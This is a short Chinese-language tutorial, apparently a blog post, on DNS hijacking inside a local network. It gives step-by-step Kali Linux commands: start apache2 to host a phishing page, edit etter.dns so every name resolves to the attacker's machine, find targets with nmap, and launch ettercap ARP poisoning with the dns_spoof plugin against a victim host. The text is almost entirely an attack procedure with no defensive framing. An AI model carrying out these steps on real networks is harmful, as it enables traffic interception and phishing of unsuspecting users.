内网渗透之dns劫持

    技术2022-07-11  127

    DNS欺骗,被攻击的主机访问任意网站的回被转到特定的钓鱼网站,

    实验工具: kali linux 黑客机 win10 肉鸡 apache2 ettercap

    操作步骤 1,打开kali上的apache2服务, @kali:~# service apache2 start root@kali:~# service apache2 status 绿点就是已经开启了。

    2,制作网页,钓鱼网页不回做,就随便做了一个,命令如下 @kali:~#vim /var/www/html/index.html

    3,修改ettercap DNS文件; ot@kali:~# vim /etc/ettercap/etter.dns A 192.168.1.112 (黑客机IP地址)

    4,寻找目标IP kali:~# nmap -sP 192.168.1.1-255

    5,发起欺骗 kali:~# ettercap -i eth0 -T -P dns_spoof -M arp /192.168.1.132/// IP地址是被攻击的主机,

    6,被攻击的主机访问任意网站的回被劫持,

    Processed: 0.009, SQL: 9